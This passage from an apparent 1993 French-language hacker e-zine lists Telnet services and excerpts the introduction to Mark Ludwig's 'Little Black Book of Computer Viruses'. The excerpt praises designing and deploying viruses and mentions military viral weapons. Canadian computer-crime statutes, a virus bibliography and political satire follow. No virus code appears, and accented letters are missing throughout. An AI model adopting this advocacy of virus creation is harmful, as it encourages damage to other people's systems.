128.255.40.200
iscabbs
This used to tag along with ISCABBS, but provides an excellent
service.
This is the only site of its kind (that I know of...), providing
Telnet
access to files normally available only by FTP.
Mirrors FTP sites on several platforms.
Also has a Bulletin system featuring (of all things...) this
list.
info.rutgers.edu
128.6.26.25
info
dictionary, thesaurus, Bible, Koran, Constitution, CIA World Fact
Book
and CD listing all online, just for starters!
liberty.uc.wlu.edu
137.113.10.35
lawlib
Law library. Online guide to a few hundred or so sites with law
info.
netinfo.berkeley.edu 117
128.32.136.12 117
Network Information.
Weather Underground
downwind.sprl.umich.edu 3000
madlab.sprl.umich.edu 3000
141.212.196.177 3000
Weather from the NWS for hundreds of cities.
Suggested that you know the 3-letter airport code to access the
city...
LAX, BOS, etc..
SFI BBS
bbs.santafe.edu
192.12.12.6
bbs
A very serious, research-oriented BBS. It is requested that you
only
use this BBS for work of some kind.
National Education BBS
nebbs.nersc.gov
128.55.128.90
guest
Running EBBS (Pirate), this is a system dedicated to US
educational
issues, operated by the government.
Current time (Mountain):
telnet india.colorado.edu 13
--
CC May. Sometimes author of Not Another List. mcm@sun.cse.nau.edu
(include stupid or funny comment here.) mcmay@nauvax.ucc.nau.edu
"I'm a few bricks short of a load, 72650.414@compuserve.com
But a full load always hurt my back."-Barenaked Ladies.
Voil
les amis, une fois le systme install (i.e. NPC.COM
(je prfre toujours NPC.ORG)) tout ceci sera
votre porte (si
jamais le projet se ralise bien sr). Pour l'instant, du
courrier internet est disponible ici mme
Quebec. O a? me
direz-vous. Sur Sietch BBS, et pas par des moyens bullshit comme
le gateway
IEEE.ORG avec FidoNet; vous aurez comme adresse
username@sietch.ci.net
C'est pas beau a? Quel prix pour tout cel
? 5 piastres par
mois (pas de mail-ftp ni de mail server authoriser).
Gurney Halleck
ghalleck@sietch.ci.net
----------------------------------------------------------------
úAú úPúRúEúVúIúOúUúSúLúYú úUúNúKúNúOúWúNú úLúIúFúEúSúTúYúLúEú
----------------------------------------------------------------
=================================================================
Think in new ways about computer viruses...
crit par: Coaxial Karma
NORTHERN PHUN CO. (c) 1993
=================================================================
Eh bien, me voil
reparti!... Aprs un long repos d
certaines circonstances quelques peu encombrantes ®grin¯...
Premirement, pour bien repartir, j'ai dcid de transcrire
quelques parties du livre crit par Mark Ludwig, "The Little
Black Book of Computer Viruses"... Eh bien oui, enfin un guide
complet pour les personnes dsirant apprendre l'art de crer des
virus informatiques.
La cration de virus informatiques peut tout aussi bien tre
une science. En assumant qu'un virus informatique a les mmes
buts qu'un organisme vivant: survivre et se reproduire...
Mais, avant de dbuter l'apprentissage de cet art, on se
doit de connatre certaines rgles de base, qui sont essentielles
votre survie... Et, pour connatre ces rgles, vous devez lire
trs attentivement l'introduction du livre ci-mentionn...
Tout d'abord, il faut savoir que le fait d'crire un virus,
et de l'exprimenter est tout
fait lgal... C'est de
l'exprimenter sur un micro-ordinateur autre que le sien qui ne
l'est point...Pour appuyer cette affirmation, j'ai joint
la fin
de cet article un billet publi par un tudiant en droit sur les
virus informatiques...
Je vous recommande trs FORTEMENT de lire attentivement le
"WARNING" au dbut du texte transcrit ainsi que de bien saisir ce
qui est publi dans l'introduction de la partie du livre
transcrit dans cet article, avant de vous mettre
crer vos
propres virus informatiques. Il serait dommage de vous voir
poursuivi par une compagnie parce que vous avez dtruit leur
banque de donnes, inconsciemment...
Si par hasard vous aimeriez poursuivre votre recherche, j'y
ai joint une bibliographie sur les virus...
=================================================================
From: Henry_Waldock@mtsg.ubc.ca
Message-Id: <1516894@mtsg.ubc.ca>
I am a Canadian law student with a BSc in Computer Science.
I'm doing a paper on computer viruses and the Criminal Law.
When the Canadian Parliament considered computer misuse,
viruses were not a problem, but the legislation they produced
isn't bad. I will attach a copy at the end of this message. They
created a kind of "trespass to information" which they called
"unauthorized access to a computer system", and a kind of
"vandalism to information", which they called "unauthorized
alteration or destruction of computerized data". My major
criticism is that they didn't explicitly criminalize the
unauthorized consumption of computer resources. While the
language they chose may not suit your purposes exactly, the three
concepts of
1) unauthorized access to services (and data),
2) unauthorized consumption of services, and
3) unauthorized alteration/destruction of data
should cover most forms of computer abuse.
If you define the purposes for which a user is _authorized_ to
use his or her own account/equipment, you can limit even private
commercial usage. See also the California Penal Code s.502, and
the Pennsylvania 18 PA Cons. Stat. Amm s. 3933.
342.1
(1) Every one who, fraudulently and without color of right,
(a) obtains, directly or indirectly, any computer service
(b) by means of an electro-magnetic, acoustic, mechanical
or other device, intercepts or causes to be
intercepted, directly or indirectly, any function of
a computer system, or,
(c) uses or causes to be used, directly or indirectly, a
computer system with intent to commit an offense
under paragraph (a) or (b) or an offense under
section 430 in relation to data or a computer
system is guilty of an indictable offence and liable
to imprisonment for a term not exceeding ten years,
or is guilty of an offence punishable on summary
conviction.
(2) In this section, "computer program" means data
representing instructions or statements that, when
executed in a computer system, causes the computer to
perform a function; "computer service" includes data
processing and the storage or retrieval of data;
"computer system" means a device that, or a group of
interconnected or related devices one or more of which,
(a) contains computer programs or other data, and
(b) pursuant to computer programs,
(i) performs logic and control, and
(ii) may perform any other function;
"data" means representation of information or of the
concepts that are being prepared or have been prepared in
a form suitable for use in a computer system;
"electro-magnetic, acoustic, mechanical or other device"
means any device or apparatus that is used or is capable
of being used to intercept any function of a computer
system, but does not include a hearing aid used to
correct subnormal hearing of the user to not
better than normal hearing;
"function" includes logic, control, arithmetic, deletion,
storage and retrieval and communication of
telecommunication to, from or within a computer system;
"intercept" includes listen to or record a function of a
computer system, or acquire the substance, meaning or
purport thereof.
430.
[...]
(1.1) Every one commits mischief who wilfully
(a) destroys or alters data;
(b) renders data meaningless, useless or ineffective;
(c) obstructs, interrupts or interferes with the lawful
use of data; or
(d) obstructs, interrupts or interferes with any person
in the lawful use of data or denies access to data to
any person who is entitled to access thereto.
[...]
(8) In this section, "data" has the same meaning as in
section 342.1.
---
---
WARNING: This book contains complete source code for live
computer viruses which could be extremely dangerous in the hands
of incompetent persons. You can be held legally liable for the
misuse of these viruses, even if such misuse is unintentional. Do
not attempt to execute any of the code in this book unless you
are well versed in systems programming for personal computers,
and you are working on a carefully controlled and isolated
computer system.
---
The Little Black Book Of Computer Viruses
Volume One:
The Basic Technology
By Mark A. Ludwig
American Eagle Publications, Inc.
Post Office Box 41401
Tucson, Arizona 85717
- 1991 -
And God saw that it was good,
And God blessed them, saying
"Be fruitful and multiply."
Genesis 1:21,22
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
============
INTRODUCTION
============
This is the first part in a series of three books about
computer viruses. In these volumes, I want to challenge you to
think in new ways about viruses, and break down false concepts
and wrong ways of thinking, and go on from there to discuss the
relevance of the computer viruses in today's world. These books
are not a call to a witch hunt, or manuals for protecting
yourself from viruses. On the contrary, they will teach you how
to design viruses, deploy them, and make them better. All three
volumes are full of source code for viruses, including both new
and well known varieties.
It is inevitable that these books will offend some people.
In fact, I hope they do. They need to. I am convinced that
computer viruses are not evil and that programmers have the right
to create them, posses them and experiment with them. That kind
of a stand is going to offend a lot of people, no matter how it
is presented. Even a purely technical treatment of viruses which
simply discussed how to write them and provided some examples
would be offensive. The mere thought of a million well armed
hackers out there is enough to drive some bureaucrats mad. These
books go beyond a technical treatment, though, to defend the idea
that viruses can be useful, interesting, and just plain fun. That
is bound to prove even more offensive. Still, the truth is the
truth, and it needs to be spoken, even if it is offensive. Morals
and ethics cannot be determined by a majority vote, any more than
they can be determined by the barrel of a gun or loud mouth.
Might does not make right.
If you turn out to be one of those people who gets offended
or upset, or if you find yourself violently disagreeing with
something I say, just remember what an athletically minded friend
of mine once told me: "No pain, no gain." That was in reference
to muscle building, but the principle applies intellectually as
well as physically. If someone only listens to people he agrees
with, he will never grow and he'll never succeed beyond his
little circle of yes-men. On the other hand, a person who listens
to different ideas at the risk of offense, and who at least
considers that he might be wrong, cannot but gain from it. So if
you are offended by something in this book, please be critical -
both of the book and of yourself- and don't fall into a rut and
let someone else tell you how to think.
From the start I want to stress that I do not advocate
anyone's going out and infecting an innocent party's computer
system with a malicious virus designed to destroy valuable data
or bring their system to a halt. That is not only wrong, it is
illegal. If you do that, you could wind up in jail or find
yourself being sued for millions. However, this doesn't mean that
it is illegal to create a computer virus and experiment with it,
even though I know some people wish it was. If you do create a
virus, though, be careful with it. Make sure you know it is
working properly or you may wipe out your own system by accident.
And make sure you don't inadvertently release it into the world,
or you may find yourself in a legal jam... Even if it was just an
accident. The guy who loses a year's worth of work may not be so
convinced that it was an accident. And soon, it may be illegal to
infect a computer system (even your own) with a benign virus
which does no harm at all. The key word here is responsability.
Be responsible. If you do something destructive, be prepared to
take responsability. "The program included in this book could be
dangerous if improperly used. Treat them with the respect you
would have for a lethal weapon."
This first of three volumes is a technical introduction to
the basics of writing computer viruses. It discusses what a virus
is and how it does its job, going into the major functional
components of the virus, step by step. Several different types of
viruses are developed from the ground up, giving the reader
practical how-to information for writing viruses. That is also a
prerequisite for decoding and understanding any viruses one may
run across in his day to day computing. Many people think of
viruses as sort of a black art. The purpose of this volume is to
bring them out of the closet and look at them matter-of-factly,
to see them for what they are, technically speaking: computer
programs.
The second volume discusses the scientific applications of
computer viruses. There is a whole new field of scientific study
known as artificial life (AL) research which is opening up as a
result of the invention of viruses and related entities. Since
computer viruses are functionally similar to living organisms,
biology can teach us a lot about them, both how they behave and
how to make them better. However, computer viruses also have the
potential to teach us something about living organisms. We can
create and control computer viruses in a way that we cannot yet
control living organisms. This allows us to look at life
abstractly to learn about what it really is. We may even reflect
on such great questions as the beginning and subsequent evolution
of life.
The third volume of this series discusses military
applications for computer viruses. It is well known that computer
viruses can be extremly destructive, and that they can be
deployed with minimal risk. Military organizations throughout the
world know that too, and consider the possibility of viral attack
both a very real threat and very real offensive option. Some high
level officials in various countries already believe their
computers have been attacked for political reasons. So the third
volume will probe military strategies and real-life attacks, and
dig into the development of viral weapon systems, defeating anti-
viral defenses, etc.
You might be wondering at this point why you should spend
time studying these volumes. After all, computer viruses
apparently have no commercial value apart from their military
applications. Learning how to write them may not make you more
employable, or give you new techniques to incorporate into
programs. So why waste time with them, unless you need then to
sow chaos among your ennemies? Let me try to answer that: Ever
since computers were invented in the 1940's, there has been a
brotherhood of people dedicated to exploring the limitless
possibilities of these magnificent machines. This brotherhood has
included famous mathematicians and scientists, as well as
thousands of unnamed hobbyists who built their own computers, and
programmers who love to dig into the heart of their machines. As
long as computers have been around, men have dreamed of
intelligent machines which would reason, and act without being
told step by step just what to do. For many years this was purely
science fiction. However, the very thought of this possibility
drive some to attempt to make it a reality. This "artificial
intelligence" was born. Yet AI applications are often driven by
commercial interests, and tend to be colored by the fact. Typical
results are knowledge bases and the like - useful, sometimes
exciting, but also geared toward putting the machine to use in a
specific way, rather that to exploring it on its own terms.
The computer virus is a radical new approach to this idea of
"living machines." Rather that trying to design something which
poorly mimics highly complex human behavior, one starts by trying
to copy the simplest of living organisms. Simple one-celled
organisms don't do very much. The most primitive organisms draw
nutrients from the sea in the form of inorganic chemicals, and
take energy from the sun, and their only goal is apparently to
survive and to reproduce. They aren't very intelligent, and it
would be tough to argue about their metaphysical aspects like
"soul." Yet they do what they were programmed to do, and they do
it very effectively. If we were to try to mimic such organisms by
building a machine - a little robot - which went around
collecting raw materials and putting them together to make
another robot, we would have a very difficult task on our hands.
On the other hand, think of a whole new universe - not this
physical world, but an electronic one, which exists inside of a
computer. Here is the virus' world. Here it can "live" in a sense
not too diffrentt from that of primitive biological life. The
computer virus has the same goal as a living organism - to
survive and to reproduce. It has environmental obstacles to
overcome, which could "kill" it and render it inoperative. And
once it is released, it seems to have a mind of its own. It runs
off in its electronic world doing what it was programmed to do.
In this sense it is very much alive.
There is no doubt that the beginning of the life was an
important milestone in the history of the earth. However, if one
tries to consider it from the viewpoint of inanimate matter, it
is difficult to imagine life as being much more than a nuisance.
We usually assume that life is good and that it deserves to be
protected. However, one cannot take a step further back and see
life as somehow beneficial to the inanimate world. If we consider
only the atoms of the universe, what difference does it make if
the temperature is seventy degrees farenheit or twenty million?
What difference would it make if the earth were covered with
radioactive materials? None at all. Whenever we talk about the
environment and ecology, we always assume that life is good and
that it should be nurtured and preserved. Living organisms
universally use the inanimate world with little concern for it,
from the smallest cell which freely gathers the nutrients it
needs and pollutes the water it swims in, right up to the man who
crushes up rocks to refine the metals out of them and build
airplanes. Living organisms use the material world as they see
fit. Even when people get upset about something like strip
mining, or an oil spill, their point of reference is not that of
inanimate nature. It is an entirely selfish concept (with respect
to life) that motivates them. The mining mars the beauty of the
landscape - a beauty which is in the eye of the (living) beholder
- and it makes it unhabitable. If one did not place a special
emphasis on life, one could just as well promote strip mining as
an attempt to return the earth to its pre-biotic state!
I say all of this not because I have a bone to pick with
ecologists. Rather I want to apply the same reasoning to the
world of computer viruses. As long as one uses only financial
criteria to evaluate the worth of a computer program, viruses can
only be seen as a menace. What do they do besides damage valuable
programs and data? They are ruthless in attempting to gain access
to the computer system resources, and often the more ruthless
they are, the more successful. Yet how does that differ from
biological life? If a clump of moss can attack a rock to get some
sunshine and grow, it will do so ruthlessly. We call that
beautiful. So how different is that a computer virus attaching
itself to a program? If all one is concerned about is the
preservation of inanimate objects (which are ordinary programs)
in this electronic world, then of course viruses are a nuisance.
But maybe there is something deeper here. That all depends
on what is most important to you, though. It seems that modern
culture has degenerated to the point where most men have no
higher goals in life than to seek their own personal peace and
prosperity. By personal peace, I do not mean freedom from war,
but a freedom to think and believe whatever you want without ever
being challenged in it. More bluntly, the freedom to live in a
fantasy world of your own making. By property, I mean simply an
ever increasing abundance of material possessions. Karl Marx
looked at all of mankind and said that the motivating force
behind every man is his economic well being. The result, he said,
is that all of history can be interpreted in terms of class
struggles - people fighting for economic control. Even though
many in our government decry Marx as the father of communism, our
nation is trying to squeeze itself into the straight jacket he
has laid for us. That is why two of George Bush most important
campaign promises were "four more years of prosperity" and "no
new taxes." People vote for their wallets, even when they know
the politicians are lying through their teeth.
In a society with such values, the computer becomes merely a
resource which people use to harness an abundance of information
and manipulate it to their advantage. If that is all there is to
computers, then computer viruses are a nuisance, and they should
be eliminated. Surely there must be some nobler purpose for
mankind than to make money, though, even though that may be
necessary. Marx may not think so. The government may not think
so. And a lot of loud-mouthed people may not think so. Yet great
men from every age and every nation testify to the truth that man
does have a higher purpose. Should we not be as Socrates, who
consider himself ignorant, and who sought Truth and Wisdom, and
valued them more highly than silver and gold? And if so, the
question that really matters is not how computers can make us
wealthy or give us power over others, but how they might make us
"wise". What can we learn about ourselves? About our world and,
yes, maybe even about God? Once we focus on that, computer
viruses become very interesting. Might we not understand life a
little better if we can create something similar, and study it,
and try to understand it? And if we understand life better, will
we not understand our lives, and our world better as well?
A word of caution first: Centuries ago, our nation was
etablished on philosophical principles of good government, which
were embodied in the Declaration of Independence and
Constitution. As personal peace and prosperity have become more
important than principles of good government, the principles have
been manipulated and redefined to suit the whims of those who are
in power. Government has become less and less sensitive to civil
rights, while it has become easy for various political and
financial interests to manipulate our leaders to their adventage.
Since people have largely ceased to challenge each other in
what they believe, accepting instead the idea that whatever you
want to believe is OK, the government can no longer get people to
obey the law because everyone believes in a certain set of
principles upon which the law is founded. Thus, government must
coerce people into obeying it with increasingly harsh penalities
for disobedience - penalities which often fly in the face of long
established civil rights. Furthermore, the government must
restrict the average man's ability to seek recourse. For example,
it is very common for the government to trample all over long-
standing constitutional rights when enforcing the tax code. The
IRS routinely forces hundreds of thousands of people to testify
against themselves. It routinely puts the burden of proof on the
accused, seizes his assets without trial, etc., etc. The bottom
line is that it is not expedient for the government to collect
money from its citizens if it has to proove their tax documents
wrong. The whole system would break down in a massive overload.
Economically speaking, it is just better to put the burden of
proof on the citizen, Bill of Rights or no.
Likewise, to challenge the government on a question of
rights is practically impossible, unless your case happens to
serve the purposes of some powerful special interest group. In a
standard courtroom, one often cannot even bring up the subject of
constitutional rights. The only question to be argued is whether
or not some particular law was broken. To appeal to the Supreme
Court will cost millions, if the politically motivated justices
will even condescend to hear to case. So the government becomes
pratically all-powerful, God walking on earth, to the common man.
One man seems to have little recourse but to blindy obey those in
power.
When we start talking about computer viruses, we're treading
on some ground that certain people want to post a "No Trepassing"
sign on. The congress of the United States has considered a
"Computer Virus Eradication Act" which would make it a felony to
write a virus, or for two willing parties to exchange one. Never
mind that the constitution garantees freedom of speech and
freedom of the press. Never mind that it garantees the citizens
the right to bear military arms (and viruses might be so
classified). While that law has not passed as of this writing, it
may by the time you read this book. If so, I will say without
hesitation that it is a miserable tyranny, but one that we can do
little about... for now.
Some of our leaders may argue that many people are not
capable of handling the responsability of power that comes with
understanding computer viruses, just as they argue that people
are not able to handle the power of owning assault rifles or
machine guns. Perhaps some cannot. But I wonder, are our leaders
any better able to handle the much more dangerous weapons of law
and limitless might? Obviously they think so, since they are busy
trying to centralize all power into their own hands. I disagree.
If those in government can handle power, then so can the
individual. If the individual cannot, then neither can his
representatives, and our end is either tyranny or chaos anyhow.
So there is no harm in attempting to restore some small power to
the individual.
But remember: truth seekers and wise men have been
persecuted by powerful idiots in every age. Although computer
viruses may be very interesting and worthwhile, those who take an
interest in them may face some serious challenges from base men.
So be careful.
Now join with me and take the attitude of early scientists.
These explorers wanted to understand how the world worked - and
whether it could be turned to a profit mattered little. They were
trying to become wiser in what's really important by
understanding the world a little better. After all, what value
could there be in building a telescope so you could see the moons
around Jupiter? Galileo must have seen something in it, and it
must have meant enough to him to stand up to the ruling
authorities of his day and do it, and talk about it, and
encourage others to do it. And to land in prison for it. Today
some people are glad he did.
So why not take the same attitude when it comes to creating
life on a computer? One has to wonder where it might lead. Could
there be a whole new world of electronic life forms possible, of
which computer viruses are only the most rudimentary sort?
Perhaps, they are the electronic analog of the simplest one-
celled creatures, which were only the tiny beginning on life on
earth. What would be the electronic equivalent of a flower, or a
dog? Where could it lead? The possibilities could be as exciting
as the idea of a man actually standing on the moon would have
been to Galileo. We just have no idea.
There is something in certain men that simply drives them to
explore the unknown. When standing at the edge of a vast ocean
upon which no ship ever sailed, it is difficult not to wonder
what lies beyond the horizon just because the rules of the day
tell you you're going to fall of the edge of the world (or
they're going to push you off) if you try to find out. Perhaps
they are right. Perhaps there is no value out there. Yet great
explorers down trough the ages have explored other oceans and
succeeded. And one thing is for sure: we'll never know if someone
doesn't look. So I would like to invite you to climb aboard the
little mast that I have built and go exploring...
---
Bibliography on Viruses.
The following is a list of books on the subject of computer
viruses and virus-related topics that I have accumulated over the
years. It is not meant to be all-inclusive or a complete guide
on the subject and inclusion here is not to be concluded as being
an endorsement of any sort.
Aryeh Goretsky TEL: (408) 988-3832
Mgr, Tech Support Dept FAX: (408) 970-9727
McAfee Associates, Inc. BBS: (408) 988-3832
3350 Scott Blvd, Bldg 14 CIS: 76702,1714 Santa
Clara, CA 95054-3107 Internet:
aryehg@mcafee.COM
_________________________________________________________________
Burger, Ralf. COMPUTER VIRUSES: A HIGH-TECH DISEASE, 3rd Ed.
Abacus Press, Grand Rapids, MI: 1989. 276pp
______, ____. COMPUTER VIRUSES AND DATA PROTECTION. Abacus
Press, Grand Rapids, MI: 1991. 353pp
Denning, Peter J., Ed. COMPUTERS UNDER ATTACK: INTRUDERS, WORMS
AND VIRUSES, ACM PRESS: 1990. 554pp
Ferreyra Cortes, Gonzalo. VIRUS EN LAS COMPUTADORAS (in Spanish),
Macrobit, Miami, FL: 1990.
Fites, Philip, Peter Johnston, and Martin Kratz. COMPUTER VIRUS
CRISIS, THE, Van Nostrand Reinhold, NY: 1989. 171pp
Haynes, Colin. THE COMPUTER VIRUS PROTECTION HANDBOOK, Sybex,
Alameda, CA: 1990. 192pp
Hoffman, Lance J, Ed. ROGUE PROGRAMS: VIRUSES, WORMS, AND TROJAN
HORSES, Van Nostrand Reinhold, NY: 1990. 384pp
Hruska, Jan. COMPUTER VIRUSES AND ANTI-VIRUS WARFARE. Ellis
Horwood, Ltd., West Sussex, UK: 1990. 128pp
Jacobson, Robert V. THE PC VIRUS CONTROL HANDBOOK, 2nd Edition,
Miller Freeman Publications, NY: 1990. 162pp
________, ________. USING McAFEE ASSOCIATES SOFTWARE FOR SAFE
COMPUTING. International Security Technology, NY: 1992. 143pp
Jarvinen, Petteri. TIETOKONE VIRUKSET (in Finnish), Werner
Soderstrom Osakeyhtio, Helsinki: 1990. 226pp
Javeri, Harsh, and Suchit Nanda. WAR ON VIRUS, The Computer Book
Shop, Bombay: 1990. 292pp
Lundell, Allan. VIRUS! THE SECRET WORLD OF COMPUTER INVADERS THAT
BREED AND DESTROY. Contemporary Books, Chicago: 1989. 189pp
McAfee, John, and Colin Haynes. COMPUTER VIRUSES, WORMS, DATA
DIDDLERS, KILLER PROGRAMS AND OTHER THREATS TO YOUR SYSTEM. St
Martins, NY: 1988. 235pp
The following books, while not specifically about computer
viruses, contain information that may be of interest:
Baker, Richard H. COMPUTER SECURITY HANDBOOK, 2nd Ed. TAB Books,
Blue Ridge Summit, PA: 1991. 416pp
DeMaio, Harry B. INFORMATION PROTECTION AND OTHER UNNATURAL
ACTS., AMACOM, New York: 1992. 232pp
Forester, Tom, and Perry Morrison. COMPUTER ETHICS: CAUTIONARY
TALES AND ETHICAL DILEMMAS IN COMPUTING. MIT Press, Cambridge:
1990. 193pp
Jennings, Karla. THE DEVOURING FUNGUS: TALES OF THE COMPUTER AGE,
WW Norton & Co., NY: 1990. 237pp
Mueller, Scott. QUE'S GUIDE TO DATA RECOVERY. QUE Corporation,
Carmel, IN: 498pp
National Research Council. COMPUTERS AT RISK: SAFE COMPUTING IN
THE INFORMATION AGE. National Academy Press, Washington DC: 1991.
303pp
Raymond, Eric, Ed. THE NEW HACKERS DICTIONARY., MIT Press,
Cambridge: 1991. 433pp
Rothman, David H. THE COMPLETE LAPTOP COMPUTER GUIDE, St Martins,
NY: 1990. 384pp
Sawicki, Ed. LAN DESKTOP GUIDE TO SECURITY, SAMS, Carmel, IN:
1992. 349pp
Wilson, Ralph. HELP! THE ART OF COMPUTER TECHNICAL SUPPORT,
Peachpit Press, Berkeley: 1991. 231pp
=================================================================
----------------------------------------------------------------
úAú úPúRúEúVúIúOúUúSúLúYú úUúNúKúNúOúWúNú úLúIúFúEúSúTúYúLúEú
----------------------------------------------------------------
PCùRPùPLùNPDùBQ ÄÄÄÄÄÄ-[ AUX URNES!! ]ÄÄÄÄÄÄ-BQùNPDùPLùRPùPCù
par Fairy Dust
Ce matin, vers 7:00hres, je dors encore. Physiquement, je
suis assis, mais neurologiquement, je cogne des clous. Que faire?
Je dcide alors de tenter de phantasmer afin de soutirer un peu
d'nergie, via une petite libido,
mon systme reproducteur. A
qui vais-je donc rver? Rflchissons. Ces temps-ci, c'est les
lections... Kim Campbell...
Beuarhk!
Ct phantasme, c'est plutt rat merci, mais grce
ce
soudain accs de rpulsion, j'ai atteint mon objectif: me
rveiller. C'est bien la premire fois qu'une lection me sert
quelque chose! Quel gaspillage d'nergie que cet exercice qui
consiste
demander au contribuable de choisir,
ses frais
merci, entre bonnet-blanc et blanc-bonnet (en fait les bonnets
sont plutt rouges ou bleus, mais c'est aussi inepte).
Ces mornes penses au sujet des plbiscites me rendent peu
peu un tantinet neurasthnique. Lorsque le cafard s'empare de
moi, je deviens habituellement apathique et je me mets
m'endormir. Et je pense encore un peu... Les lections... Les
sondages BBM, comme la brasserie du mme nom. Ah! Dbits de
boissons, je vous aime! Que de bonheur ai-je connu en ces lieux!
Et qui plus est, ma pense vient de changer de sujet et je me
regaillardis. Je me souviens un jour d'avoir bu et, le lendemain,
d'avoir eu un srieux mal de bloc, comme le parti du mme nom...
Ah! non, pas encore la politique! Ok d'abord! C'est les
lections, ben on va en parler!
Ce midi je vais luncher avec des confrres. Aprs avoir fini
de manger, je leur propose un petit "brain storming". Je leur lis
des titres d'articles dans le journal de Qubec du 24 septembre
1993, et je recueille leurs ractions spontanes:
Titre : "Pas le temps pour en parler, dit Campbell" (page 7)
Raction : De quoi? De la recette de la soupe aux tomates?
Titre : "Pas question d'un chque en blanc, dit Bouchard." (page
7)
Raction : J'dirai pas ce que je pense, a pourrait paratre
raciste.
Titre : "La main aux Qubecois" (page 7)
Raction : La bouche
Jean Chrtien; les tomates de provigo.
Titre : "Elu selon la tradition" (page 8)
Raction : La tradition orale? (dans le sens de: buccale...)
Titre : "Parizeau tait tout simplement enchant" (page 8)
Raction : Il avait perdu 5 livres!
Moralit : aprs les lections, mfiez-vous de votre dicton. En
effet, si vous voulez dire: "Je me suis mis dans le rang pour
voter", vitez de prononcer: "je me suis mis dans le vent pour
roter."
Mais pour ceux qui ne savent toujours pas comment voter,
voici
quelques conseils:
Premirement, vous pouvez videmment suivre attentivement la
campagne lectorale, vous tenir
l'afft de tout ce qui se passe
sur la scne politique et ainsi aboutir
un choix clair et
intelligent. Mais soyons ralistes: qui de nous en a le temps?
Vous pouvez galement utiliser la mthode traditionnelle:
votez pour le plus beau ou la plus belle! Cette mthode est un
peu simplette, je l'avoue, mais elle a l'avantage de vous
indiquer pour qui VOUS NE VOTEREZ PAS!
Si vos livres de chevet sont les grammaires Grvisse et
l'Oxford Dictionnary, vous pouvez toujours prendre en
considration vos prfrences linguistiques. Enregistrez les
dbats nationaux, et amusez-vous
compter les erreurs faites par
les francophones dans la langue de Shakespeare et celle des
anglos dans la ntre. Cela peut vous sembler lgrement
fastidieux, mais quelle soire ducative!
En dernier recours, il reste la mthode des rfrences
culturelles.
Celle-ci consiste
faire des associations d'ides,
partir
des partis politiques et de choisir la rfrence que vous
prfrez.
Voici quelques exemples:
-les CONservateurs : Sol et Gobelet...
-le NPD: Le dernier des Mohicans...
-le Reform Party: La souris qui rugissait...
-le Bloc qubcois: le cheval de Troie...
-les Libraux: Le retour de jason...
Donc pour rsumer, la classe politique actuelle est
constitue en majeure partie de dinosaures uss par l'exercice du
pouvoir et aucune relve valable ne semble se pointer
l'horizon. La jeunesse se sent impuissante devant cet tat des
choses et elle l'accepte. Combien de fois n'entendons-nous pas
:"il faudrait que le gouvernement fasse quelque chose!" L'horizon
est sombre pour les personnes de ma gnration: jamais les
emplois n'auront t aussi rares et les frais de scolarit aussi
levs. Et tout cela est accept avec complaisance, comme si la
ralit nous concernait moins que les courbes de la dernire
animatrice de Musique Plus. Le premier pas pour changer les
choses, c'est de se dpartir de ce sentiment d'impuissance et de
ce cynisme prvalant. Si cela n'est pas fait, bientt, nous
baignerons tellement dedans, que nous ne nous en rendrons mme
plus compte...
....Dust....
----------------------------------------------------------------
úAú úPúRúEúVúIúOúUúSúLúYú úUúNúKúNúOúWúNú úLúIúFúEúSúTúYúLúEú
----------------------------------------------------------------
TRASHING BELL STYLE
par Santa Claus
LES LAMENTATIONS DE BELL
""""""""""""""""""""""""
Claude Beauregard, v.p. adjoint aux affaires publiques de
Bell, a t dsign pour s'adresser
tous les employs de
l'entreprise, via le Rseau de tlvision Bell, qui est diffus
en circuit ferm dans tous les centres Bell. Le sujet de son
laus, of course: la dcision du CRTC.
Je ne vous rapporterai pas son discours verbatim, tant il
est soporifique. Mais, en gros, il blme le CRTC pour toutes les
catastrophes passes, prsentes, et
venir, de l'invasion des
sauterelles dans l'gypte ancienne,
la faillite prochaine de
Bell. J'en mets un peu, mais vous auriez d l'entendre!
Et puis, la brique que tous les employs n'attendaient pas:
la compression du personnel. En fait, c'est dit en termes vagues,
style: "comment quilibrer nos dpenses et nos revenus...
communiquerons notre plan d'action aux employs".
Lesdits employs furent d'autant plus surpris que, l'an
dernier (tel que rapport dans NPC, si vous vous en souvenez),
tous les employs avaient eu droit
une prime supplmentaire.
Chers employs de Bell, bienvenue dans les annes 90 et sa
clbre rcession! Surtout qu'il y a fort
parier qu'aucun
employ ne perdra son poste.
Il faut comprendre que, dans la dcision du CRTC, on
accusait carrment Bell d'tre une gang de crosseurs. Pas en ces
termes, naturellement, mais presque. Voici d'ailleurs un extrait
de la dcision du CRTC:
"Bell a sous-estim ses bnfices prvus tout en
surestimant ses dpenses prvues et les incidences
de la concurrence dans le march de l'interurbain."
et
"A ce chapitre, le CRTC a jug que Bell a sous-es-
tim la croissance du march et surestim les per-
tes de part du march qu'elle est susceptible de
subir par suite de la concurrence dans l'interur-
bain."
Et comment appelle-t-on quelqu'un qui FALSIFIE ses chiffres
dans un rapport financier?
Get this straight, guys. Nous l'avons souvent soulign, et
nous le rptons une dernire fois: avec 931 millions de profits
NETS l'an dernier (certains disent plus encore), Bell s'est
classe bonne deuxime au niveau des compagnies canadiennes les
plus profitables. Les prvisions de Bell, pour 1993, valuaient
leurs pertes
10,5%, alors que le CRTC estimait que la ralit
tait plus proche de 7%. Bell, pour 1994: 20,2%. Non, moins de
12%, rpond le CRTC.
Mais tranchons la poire en deux, et supposons, un instant,
que Bell perde 15% dans la prochaine anne financire, aux mains
d'Unitel. 15% de 931 millions, ce qui fait, en gros, 140
millions. Ce qui va quand mme leur laisser 791 millions, AU
PIRE, de profits NETS. Allez-vous pleurer pour Bell?
Mais tout a, c'est de la roupie de sansonnet. Si Bell tait
une compagnie ordinaire, a ne me drangerait pas outre mesure,
part du fait que je persiste
me demander quand est-ce qu'on
passe de profits raisonnables
TROP de profits. Combien a leur
prend pour tre heureux? Ont-ils une limite? Mais a, c'est toute
l'histoire du capitalisme sauvage. Et a ne me drangerait pas
plus que a que Bell soit une entreprise capitaliste sans aucun
gard pour le consommateur... SI la tlphonie n'tait pas un
service ESSENTIEL, et SI Bell n'tait pas en situation de
monopole.
C'est l
que le bat blesse, les amis. C'est ici que nous
traons une ligne dans le sable. Bell n'a pas le droit de
ranonner, comme une autre compagnie de profiteurs, les
consommateurs, parce que nous ne pouvons pas rpliquer en se
faisant dbrancher,
